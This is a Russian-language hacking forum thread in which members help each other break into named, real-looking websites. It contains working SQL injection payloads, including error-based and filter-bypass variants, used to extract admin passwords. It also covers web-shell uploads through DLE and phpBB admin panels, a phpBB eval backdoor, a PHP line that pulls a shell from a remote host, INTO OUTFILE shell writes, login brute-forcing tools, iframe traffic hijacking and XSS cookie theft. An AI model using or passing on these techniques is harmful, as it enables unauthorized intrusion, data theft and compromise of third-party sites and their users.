SergioBlog said:
Если отрублены функции exec,passthru,popen,proc_open,shell_exec,system,pc ntl_exec есть другие варианты?)))


perl, python, ssi, disable_functions bypass

Expl0ited said:

Code:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat_ws(char(58),user_n ame,user_password)))+from+user_auth+limit+0,1--+

скобку пропустил


вставил не помогает =(

Хочу залить шелл через баннер / картинку...

Побываю так shell.php%00.gif shell.php.gif если просто shell.php то режет...Локального инклуда нет

Есть ещё варианты?

Einstein,


HTML:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat(user_name,char(58) ,user_password)))+from+0x757365725f61757468+limit+ 0,1--+[/HTML
aydin-ka,
Название CMS? Попробуй старый добрый *.phtml.

иметься доступ в админ ку DLE V8.2 требуется залить шелл через админ ку как это сделать ?

-=Sinner=-,

через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.

-=Sinner=- said:
иметься доступ в админ ку DLE V8.2 требуется залить шелл через админ ку как это сделать ?


прийдется помудрить с разрешенными раширениями.сначала залей .htaccess потом удаляй его..из за баги удалится оригинальный файл потом уже файл нужный

tabletkO said:
-=Sinner=-
,
через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.


и часто ты так заливал? и у тебя шелл работал?

tabletkO said:
-=Sinner=-
,
через "Настройки системы" пиши в config! Сделай разрешенным тип файла *.phtml и залей прямо с http://site/engine/images.php и т.д.


Разрешения загружаемых файлов dzmvdq,pdf,htaccess,php,zip,rar,phtml,doc,exe

так же доступна загрузка изображений с самой админки может это как то облегчит заливку шелла ?

Gorev,

да работал, но конечно сначала удалил .htaccess...

tabletkO said:
Einstein
,

HTML:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat(user_name,char(58) ,user_password)))+from+0x757365725f61757468+limit+ 0,1--+[/HTML

попробовал вот результат:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x757365725f61757468 limit 0,1--' at line 1


[/QUOTE]
попробовал вот результат:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x757365725f61757468 limit 0,1--' at line 1
[/HTML]

[/QUOTE]

Как залить шелл на сайтe Jooma ?

Там стоит virtuemart если что.

kyboe,

есть админка? Если есть, то в чем проблема? Если нет, то делай уроки

Einstein,

скинь сайт в ЛС, разберусь.

Люди! Как найти шелл, если сервер WINDOWS? grep, find это никсовые...

tabletkO said:
Einstein,
скинь сайт в ЛС, разберусь.


Что-бы не разбираться, попробуй не советовать такую чушь )


tabletkO said:
Einstein
,

HTML:
www.xxx.xx/text.php?content_id=-4+union+select+UNHEX(HEX(concat(user_name,char(58) ,user_password)))+from+0x757365725f61757468+limit+ 0,1--+[/HTML
.

Названия таблицы в этом месте переводить в HEX нельзя.

Einstein 99% что таблица в другой базе, вы тут по кругу вопросы гоняете? :)


[/QUOTE]

Названия таблицы в этом месте переводить в HEX нельзя.

Einstein 99% что таблица в другой базе, вы тут по кругу вопросы гоняете? :)
[/HTML]

[/QUOTE]

kyboe said:
Как залить шелл на сайтe Jooma ?
Там стоит virtuemart если что.


/showpost.php?p=1809203&postcount=173

как крутить дальше не пойму?

http://www.flukehearing.com/news_manager.php?page=6616'

залил шелл


UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;


но как тепреь залить нормальный шелл туда? с помощью этого минишелла?? подскажите плс в пм буду оч признателен

satana8920 said:
залил шелл
но как тепреь залить нормальный шелл туда?
с помощью этого минишелла?? подскажите плс в пм буду оч признателен


file_put_contents('yashell.php', file_get_contents('http://ya.ru/shell.txt'));

Это если url_fopen еще разрешен.

er9j6@ said:
как крутить дальше не пойму?
http://www.flukehearing.com/news_manager.php?page=6616'


Warning: include() [function.include]: Failed opening 'sn/6616dfgh.htm' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/fluke/public_html/news_manager.php on line 11

Как бы намекает что это Local File Inclusion (LFI), где к подключаемым станицам добавляется .htm

кто нибудь знает онлайновый кодер из str скажем в char

например

asd = CHAR(97,115,100)

мне надо в binary или нех вида

0x123834756

crackforme said:
кто нибудь знает онлайновый кодер из str скажем в char
например
asd = CHAR(97,115,100)
мне надо в binary или нех вида
0x123834756


http://x3k.ru/

er9j6@ said:
http://x3k.ru/


спасибо а можно ли обойти фильтрацию слов union+select+

видом +0x556e696f6e+0x53654c656374+

скобки тоже фильтруются

если нет то как по другому?

Точнее фильтруется Union

crackforme said:
спасибо а можно ли обойти фильтрацию слов union+select+
видом +0x556e696f6e+0x53654c656374+
скобки тоже фильтруются
если нет то как по другому?


/*!union*/+/*!select*/

union%0aselect

/*!UnIoN+SeLeCt*/

UnIoN/**/SeLeCt

%75%6e%69%6f%6e%2b%73%65%6c%65%63%74

asdunionasdselectasd

%75%6e%69%6f%6e%0a%73%65%6c%65%63%74

er9j6@ said:
/*!union*/+/*!select*/
union%0aselect
/*!UnIoN+SeLeCt*/
UnIoN/**/SeLeCt
%75%6e%69%6f%6e%2b%73%65%6c%65%63%74
asdunionasdselectasd
%75%6e%69%6f%6e%0a%73%65%6c%65%63%74


спасибо

union%0aselect

crackforme said:
спасибо
union%0aselect


union%09select

union/**/select

id=(5)union(select(1),(2))

Вроде бы sql inj есть, но не получается раскрутить(


http://la2.war-top.ru/index.php?do=sitedetails&id=186'

Boolean said:
file_put_contents('yashell.php', file_get_contents('http://ya.ru/shell
.txt
'));
Это если url_fopen еще разрешен.




PHP:
regexp code(1) : eval()'d code on line 1

пишет ошибку вероятно из за кавычек как мне это убрать?

Помогите пожалуйста

Ошибка вверху сливается с темным фоном


http://la2-shop.ru/categories.php?id_cat=2'

[akep"]
DJ ][akep said:
Помогите пожалуйста
Ошибка вверху сливается с темным фоном


http://la2.war-top.ru/index.php?do=sitedetails&id=186' or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -

а дальше сам.

хинт: error based.

satana8920 said:

PHP:
regexp code(1) : eval()'d code on line 1

пишет ошибку вероятно из за кавычек как мне это убрать?


Зачем $_GET юзаете? =/

Другой масив используйте, или накрайняк $_REQUEST уж так надо $_GET оставить.

_https://rdot.org/forum/showthread.php?t=118

2-пост

http://la2-shop.ru/categories.php?id_cat=2'


в этом параметре инъекции нет. зато есть в другом:

http://la2-shop.ru/categories.php?id_msg=2'+union+select+1,2,3--+

вывод в тайтле.

d1v said:
http://la2.war-top.ru/index.php?do=sitedetails&id=186' or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -
а дальше сам.
хинт: error based.


Спасибо огромное! ++

тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...

Ребят мне как сделать так что бы шелл залился нормальный человеческий я имею доступ к админке пхпбб форум

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2;

че тут поменять и на что ? что бы был шелл всо??? ненадо умничать)

теща said:
тема такая есть веб форма логин пас капчи нету пробил вручную нету все нормально пас из 4х символов другими словами можно сбрутить легко акаунт , вопрос каким софтом ето можно сделать? что актуальное посоветуете ...


BrutusA2

Strilo4ka said:
BrutusA2


скачал AET2

сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?

поставил на перебор на TYPE HTTP (Form)

что не так сделал ?

там нету протокола https

d1v said:
в этом параметре инъекции нет.


Ты помоему спешишь куда-то постоянно

В этом тоже есть:

http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+


Strilo4ka said:
Зачем $_GET юзаете? =/
Другой масив используйте, или накрайняк $_REQUEST уж так надо $_GET оставить.


А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )

Или это какой то приватный метод, онли закрытые группы?

satana8920: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.

phpinfo вообще выводит? И что там стоит в урлфайлопен, если да

KolosJey said:
Ты помоему спешишь куда-то постоянно
В этом тоже есть:
http://la2-shop.ru/categories.php?id_cat=-3'+union+select+version()--+
А можно узнать зачем использовать $_REQUEST если " уж так надо $_GET оставить" ? )
Или это какой то приватный метод, онли закрытые группы?
satana8920
: из-за кавычек ошибки не будет. У тебя там stripslashes стоит для этого.
phpinfo вообще выводит? И что там стоит в урлфайлопен, если да


пхпинфо вывод отлично allow_url_fopen On стоит блин ребят дайте код рабочий для заливки шелла плс

copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');

KolosJey said:
copy('http://сайт с шеллом/shell.txt','./путь/на сервере/в папку с правами на запись/shell.php');


Copy() будет ограничена при safe_mode=on.

Лучше move_uploaded_file().

С командной строки можна найти так найти вритабельные директории\файлы(файлы дописать!):

find . -type d -perm 777 -print

find . -type f -perm 777 –print

Если системную команду не выполнить в php есть функция = is_writable(), через нее можна поискать вритабельные.

теща said:
скачал AET2
сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?
поставил на перебор на TYPE HTTP (Form)
что не так сделал ?
там нету протокола https


THC-Hydra работает с https. А вообще в гугле много инструментов.

Strilo4ka said:
Copy() будет ограничена при safe_mode=on.
Лучше move_uploaded_file().


Да ладно?

Какие именно ограничения будут у copy() и не будут у move_uploaded_file() при сейфмоде не просветите?

Тёща, отпиши в личку, напишу скрипт.

Все привет, у меня чисто теоретический вопрос - нашел сегодня маленький сайтик - голый html, ни одного php-скрипта, 100%. Все что есть - это корневой каталог со страничками и папка /cgi-bin, в ней лежит чей-то шелл.

Вопрос - каким образом возможно залить его? В .htaccess никакой магии с интерпретацией html как php нет. Права на папку - drwxr-xr-x. Safe mode: OFF если что, система - линукс.

=Zeus=,

через соседей, через саппорт хостинга

UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;

сделал восстановление в бд, открыл профиль, на других такого никогда не было

что за ошибка такая ?


Parse error: syntax error, unexpected ']' in /xxx/xxx/includes/usercp_register.php(686) : regexp code on line 1
Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: ] in

Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.

Запрос


Code:
http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20 system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--

Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}

В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)

aydin-ka said:
Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.
Запрос

Code:
http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20 system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--

Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}
В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)



phpinfo() это функция, а не константа, после имени идут скобки и " ; "

+ у тебя system, код не eval -ится, не сможешь вывести phpinfo, только системные команды

кто подскажет в чем проблемма,нашел xss активную попробывал впихуть скрипт в страницу,куки сразу пришли на снифер ,а вот код в странице не сохранился

xss в POST запросе

Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.

Заранее спасибо!

max9707 said:
Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.
Заранее спасибо!




PHP:


это для iframe трафа


PHP:








это что бы полностью твой сайт выводился

stepashka_ said:

PHP:


это для iframe трафа

PHP:








это что бы полностью твой сайт выводился


этот код в php должен быть в php-тегах к примеру


PHP:
echo"";

и чтобы не нарушить структуру синтаксиса, html-кода, заменил двойные ковычки на одинарные.

есть sqli, на сервере

- root

- File_priv=Y

- путь /var/www/имясайта/имяфайла (прописан в нескольких местах в бд, я не думаю, что он ложный)

- вывод ошибок выключен

- mq - off

а сама проблема заключается в том, что при заливке into_outfile даже просто не указывая директорию, а прописывая '1.php' к примеру - выкидывает!

когда ввожу полный путь - тоже самое.

при load_file открывается корневые .htaccess и .htpasswd но их читает пустыми. тоесть поле пустое и ничего вообще не выводится хотя я уверен там хоть 1 строчка но есть

когда вбиваю путь до определенного файла сайта - также выкидывает(

что это такое и возможно ли решить проблему?

Hack_Master said:
есть sqli, на сервере
- root
- File_priv=Y
- путь /var/www/имясайта/имяфайла (прописан в нескольких местах в бд, я не думаю, что он ложный)
- вывод ошибок выключен
- mq - off
а сама проблема заключается в том, что при заливке into_outfile даже просто не указывая директорию, а прописывая '1.php' к примеру - выкидывает!
когда ввожу полный путь - тоже самое.
при load_file открывается корневые .htaccess и .htpasswd но их читает пустыми. тоесть поле пустое и ничего вообще не выводится хотя я уверен там хоть 1 строчка но есть
когда вбиваю путь до определенного файла сайта - также выкидывает(
что это такое и возможно ли решить проблему?



Просто прав не хватает, скорей всего или мускул на другом сервере.

Только если ты указываешь файл без пути типа outfile '1.php', то запрос должен сработать и файл 1.php должен создастся в папке с мускулом, на которую права, разумеется, всегда есть. То же самое и для /tmp/. А passwd читается?

Чем слить базы быстрее чем с Havij 1.15 ???

А то так и с ума сойти можно одну базу сливать целый день.

И если база больше 5 метров он **** вообще виснет.

Кто чем сливает базы большие ?

Щас пробую rsaUnDumper_sql__2.0

Перехватил снифером запрос с Havij 1.15 при сливе базы .

_http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271

Как его теперь подправить под rsaUnDumper_sql__2.0 ?

zapadlo_zapa said:
Чем слить базы быстрее чем с Havij 1.15 ???
А то так и с ума сойти можно одну базу сливать целый день.
И если база больше 5 метров он **** вообще виснет.
Кто чем сливает базы большие ?
Щас пробую rsaUnDumper_sql__2.0
Перехватил снифером запрос с Havij 1.15 при сливе базы .
_http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271
Как его теперь подправить под rsaUnDumper_sql__2.0 ?


хавиж работает с выводом через ошибку..не знаю как rsaUnDumper? если работает то можно..если нет то писать скрип...или же исползовать скрипт от Пашкелы..на форуме найдешь

zapadlo_zapa said:
Чем слить базы быстрее чем с Havij 1.15 ???
А то так и с ума сойти можно одну базу сливать целый день.
И если база больше 5 метров он **** вообще виснет.
Кто чем сливает базы большие ?
Щас пробую rsaUnDumper_sql__2.0
Перехватил снифером запрос с Havij 1.15 при сливе базы .
_http://www.***********.us/product.php?id=1023%27+and%28select+1+from%28selec t+count%28*%29%2Cconcat%28%28select+%28select+%28s elect+concat%280x7e%2C0x27%2Cusers.pass%2C0x27%2C0 x7e%29+from+%60dbase%60.users+Order+by+email+limit +28396%2C1%29+%29+from+%60information_schema%60.ta bles+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x +from+%60information_schema%60.tables+group+by+x%2 9a%29+and+%271%27%3D%271
Как его теперь подправить под rsaUnDumper_sql__2.0 ?


WebCruiser работает довольно быстро

/showpost.php?p=2430589&postcount=6

help me

http://www.mobil.ru/profile_notes.php?product_id=4'''410&&n=-13

Реально ли слить сайт или залить шел в данном случае:


http://la2-shop.ru/articles.php?id=1555555'+union+select+1,2,concat_w s(0x3a,user(),database())+--+


Путь:


/home/tok-center/la2-shop.ru/docs/


Через Load_file не получалось

[akep"]
DJ ][akep said:
Реально ли слить сайт или залить шел в данном случае:
Путь:
Через Load_file не получалось


и не получится..прав то нет у юзверя бд на запись...

шелл залить есть возможность ,но по другому

Gorev said:
и не получится..прав то нет у юзверя бд на запись...
шелл залить есть возможность ,но по другому


Отпиши пожалуйста как

Нашел Xss в input.

Фильтруется
[/CODE]

EST a1ien said:
Нашел Xss в input.
Фильтруется
[/CODE]

Добрый день.

Есть логин-форма.

При подстановке кавычки в любое из полей выдается:

MySQL-Error блаблабла

SQL Query:

SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')

логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.

Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет

SQL Query:

SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')

если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".

Как тут можно в эту BINARY инжектнуться?

Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae

я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?

Всем добрый день.

Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...

http://powerdefence.ru/Uslugi_dlya_Yur_lic'

Как обойти фаервол / фильтр при проведение SQL-инъекции?

Запросы вида: =-1'+order+by+10+--+

=-1'/*--*/order/*--*/by/*--*/10--

=-1'+OrDer+By+10+--+

При всех этих запросах пишет: Соединение было сброшено

2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic')

2 aydin-ka:

=-1'/**//*!order*//**//*!by*//**/10--+

Так пробовал? Все зависит от того, где именно происходит фильтрация.

aydin-ka said:
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено


Пробуй GROUP BY

или тупо

UNION SELECT 1 --

UNION SELECT 1,2 --

UNION SELECT 1,2,3 --

UNION SELECT 1,2,3,......,N --


Shimon said:
Добрый день.
Есть логин-форма.
При подстановке кавычки в любое из полей выдается:
MySQL-Error блаблабла

SQL Query:

SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')
логин
и
пасс
- то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
Ну если ввести в оба поля
admin' or 1=1 --
то на выходе и будет
SQL Query:

SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')
если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
Как тут можно в эту BINARY инжектнуться?


В оба поля: ' or '1'='1

aydin-ka said:
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено




Code:
(-1')order(by)10--

s000r said:
Всем добрый день.
Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...
http://powerdefence.ru/Uslugi_dlya_Yur_lic'


Если у тебя поиске "Результатов не найдено", это тоже скуль? =/


Ошибка 404! Данной страницы не существует


Вроде бы ясно сказано.. ещё и крутить собрался.. распечатай, и крути, запустить можешь даже.

s000r

http://powerdefence.ru/Uslugi_dlya_Yur_lic'or(1,2)=(select*from(select(na me_const(version(),1)),name_const(version(),1))a)a nd'1/

Не слушай никого, крути


Osstudio said:

Code:
(-1')order(by)10--



Срань какая, прости господи )

Osstudio я бы на твоём месте вообще перестал писать )

http://apael.com/vote


Не уверен, но вроде инъекция в POST, запросе. Подставьте кавычку, увидите. Но реализовать не получается. Есть ли там вообще уязв?

Kerny,

Уязвимость есть! Через Live HTTP Headers...


login=&account=&password='or+1=1)+union+select+1,2+--+


Т.е. в поле Пароль:


Code:
'or+1=1)+union+select+1,2+--+

Error based, в поле логин:


Code:
'or+1=1)+and+(select+1+from(select+count(*),concat ((select+table_name+from+information_schema.tables +limit+0,1),floor(rand(0)*2))x+from+information_sc hema.tables+group+by+x)a)+--+

Получаем:


Code:
Duplicate entry 'CHARACTER_SETS1' for key 'group_key'


P.S. Не обращай внимания на цифру "1" в конце.

P.S.S. Походу mq = on ...

http://rusbanket.ru/index.php?ukey=news&blog_id=0%20union%20select%20version%28%29;+--

как такое крутить? как error based - вывел версию, а вывести значение столбца из определенной таблицы не получалось

vadd,


Code:
http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat ((select+table_name+from+information_schema.tables +limit+1,1),floor(rand(0)*2))x+from+information_sc hema.tables+group+by+x)a)--



Code:
http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat ((select+column_name+from+information_schema.colum ns+where+table_name='SC_orders'+limit+0,1),floor(r and(0)*2))x+from+information_schema.columns+group+ by+x)a)--

KolosJey said:
s000r
http://powerdefence.ru/Uslugi_dlya_Yur_lic'or(1,2)=(select*from(select(na me_const(version(),1)),name_const(version(),1))a)a nd'1/
Не слушай никого, крути
Срань какая, прости господи )
Osstudio
я бы на твоём месте вообще перестал писать )


Ошибка - не есть инъекция.

Логика не отрабатывает.

p.s. Osstudio знает, что говорит.

Pirotexnik said:
Ошибка - не есть инъекция.
Логика не отрабатывает.
p.s. Osstudio знает, что говорит.


Уязвимость есть. Пробуйте в другом браузере, не Firefox, т.к. он кавычку преображает в %27, поэтому уязвимость на данном сайте в Firefox не видна.

Результат вышеуказанного запроса:

Duplicate column name '5.0.51a-3ubuntu5.8-log'

Парадокс!

Всем доброго времени суток. Ситуация такова:

Сайт со скулей 5я ветка

index/page/id/1'+or+1+group%20by%20concat((select%20concat(0x3a, password,0x3a)%20from%20cms_administrator%20limit% 201,1),floor(rand(0)*2))%20having%20min(0)%20or%20 1='

Этот запрос дал мне пароль админа из таблицы cms_administrator. Все здорово, отлично. Соответственно пас меняем на логин выдает логин. Все тоже работает на ура. Но есть еще один column - cms_user При таком же запросе к нему меня отбрасывает на 404 ошибку, как будто закончился лимит значений. Хотя значений там хватает. Ни логины не пароли ничего из этого столбца не дает.

+ Парадокс соседом является еще один сайт с немного другим функционалом но суть та-же организация та-же. Из за расстройства использовал Havij дал ему кавычку он схавал, выдал таблицы, столбцы и версия скуля тоже 5я и есть такие же столбцы пытался стянуть через него с админами все равно с цмс юзерами куча пустых строк. Кто еще не устал ответьте в чем может быть подвох? так на вскидку.

lion-art,

это значит, что ячейки пустые... Т.е. там нет юзеров..

KolosJey said:
s000r
Срань какая, прости господи )
Osstudio
я бы на твоём месте вообще перестал писать )


Тебя кто суда звал? Вот например из этой же серии:


http://www.povituha.ru/news.php?id=62/*c*/order/*a*/by%281%29--

Osstudio said:
Тебя кто суда звал? Вот например из этой же серии:


ничего там не фильтруется

http://www.povituha.ru/news.php?id=62+order+by+6--

http://www.povituha.ru/news.php?id=62+order+by+7--

Osstudio said:
Тебя кто суда звал? Вот например из этой же серии:



Я тебе один раз объясню и больше не буду. Хочешь чему то научиться - учись. Не хочешь - продолжай писать и упираться рогами.


Osstudio said:
(-1')order(by)10--


Вот это неверный синтаксис. И ничего кроме


You have an error in your SQL syntax;
check the manual that corresponds to your MySQL


ты не получишь. Нельзя ставить by в скобки. Не говорю про кавычку в скобках, и как там должно быть реализовано в коде, фиг с ней ...

А вот это


Osstudio said:
http://www.povituha.ru/news.php?id=62/*c*/order/*a*/by%281%29--


синтаксис нормальный, и разумеется он работает.

Всё это отлично докумментировано и расписано по 100 раз, но если читать лень можно поставить денвер и тупо пробывать, прежде чем советы давать

d1v said:
ничего там не фильтруется
http://www.povituha.ru/news.php?id=62+order+by+6--
http://www.povituha.ru/news.php?id=62+order+by+7--


дык знаю, просто и так и так работает всмысле. =/

Как найти таблицу пользователей в БД?

Пробую так: http://seifi.ru/index.php?categoryID=781+UNION+SELECT+1+FROM+INFOR MATION_SCHEMA.TABLES

В ответ получаю

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name' at line 1 SQL query : select categoryID, name, brief_description, title_description, customers_rating, Price, in_stock, customer_votes, list_price, productID, default_picture, sort_order, items_sold, enabled, product_code, description, shipping_freight from SS_products where ( enabled=1 AND productID=1 ) OR ( enabled=1 AND categoryID=781 UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name

jawbreaker said:
Как найти таблицу пользователей в БД?
Пробую так:
http://seifi.ru/index.php?categoryID=781+UNION+SELECT+1+FROM+INFOR MATION_SCHEMA.TABLES
В ответ получаю
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name' at line 1 SQL query : select categoryID, name, brief_description, title_description, customers_rating, Price, in_stock, customer_votes, list_price, productID, default_picture, sort_order, items_sold, enabled, product_code, description, shipping_freight from SS_products where ( enabled=1 AND productID=1 ) OR ( enabled=1 AND categoryID=781 UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name


надо закрыть скобку условия и отрубить остальную часть запроса каментом, но там либо скобка режеться, либо каменты, попробуй так


Code:
http://seifi.ru/index.php?categoryID=781+and+(select+1+from(select +count(*),concat((version()),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)+--+

Не знаю сюда или нет, в общем суть такая, на сайте админка

Memento CMS 2, как залить шел возможно? могу заливать картинки;(

Есть вопрос по metasploit'у. Если я использую начинку windows/shell_bind_tcp, а цель находится не в локальной сети и у нее динамический ip, как коннектиться к ней, каждый раз, когда у нее сменится ip?

AppS said:
Не знаю сюда или нет, в общем суть такая, на сайте админка
Memento CMS 2, как залить шел возможно? могу заливать картинки;(


У тебя есть доступ в админку? если нет, то шелла не будет. Если есть...ищи гле можно редактировать Баннеры, шаблоны и т.д.

jawbreaker said:
Как найти таблицу пользователей в БД?
Пробую так:
http://seifi.ru/index.php?categoryID=781+UNION+SELECT+1+FROM+INFOR MATION_SCHEMA.TABLES
В ответ получаю
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name' at line 1 SQL query : select categoryID, name, brief_description, title_description, customers_rating, Price, in_stock, customer_votes, list_price, productID, default_picture, sort_order, items_sold, enabled, product_code, description, shipping_freight from SS_products where ( enabled=1 AND productID=1 ) OR ( enabled=1 AND categoryID=781 UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name


Ты table_name забыл


Code:
http://seifi.ru/index.php?categoryID=781+UNION+SELECT+table_name+F ROM+INFORMATION_SCHEMA.TABLES

P.S.nemaniak, зачем все усложнять?

http://spotters.net.ua/file/?id=1



что тут можно сделать?

OxoTnik said:
что тут можно сделать?


http://spotters.net.ua/file/?id=-1

например сделать как показано выше и раскручивать

Apache/2.2.21 (Unix) PHP5/5.2.14 with Suhosin-Patch mod_rpaf/0.6

lion-art said:
http://spotters.net.ua/file/?id=-1
например сделать как показано выше и раскручивать
Apache/2.2.21 (Unix) PHP5/5.2.14 with Suhosin-Patch mod_rpaf/0.6


вот еще:

http://spotters.net.ua/admin/

полезно будет.

ну и напоследок вот:

http://spotters.net.ua/news/entry/?545'

http://spotters.net.ua/news/entry/?id=1+or+1+group+by+concat(version(),floor(rand(0) *2)%20)having+min(0)+or+1--+

MySQL ERROR: Duplicate entry '5.0.89-log1' for key 1

SQL error

5я ветка

настроение задорное лови пока добрый

начинай с этого запроса

http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x 3a,table_name,0x3a)%20from%20information_schema.ta bles%20limit%2017,1),floor(rand(0)*2))%20having%20 min(0)%20or%201+--+

Duplicate entry ':admin_settings:1' for key 1

перебор лимитом и все получится

ну и что бы вопросов совсем не возникло перебор по столбцам делается так:

http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x 3a,column_name,0x3a)%20from%20information_schema.c olumns%20where%20table_name='admin_settings'%20lim it%200,1),floor(rand(0)*2))%20having%20min(0)%20or %201+--+

Можно ли из бд вытащить пасс от фтп?

Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды

Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица?

К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?

alerondel said:
Можно ли из бд вытащить пасс от фтп?
Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды
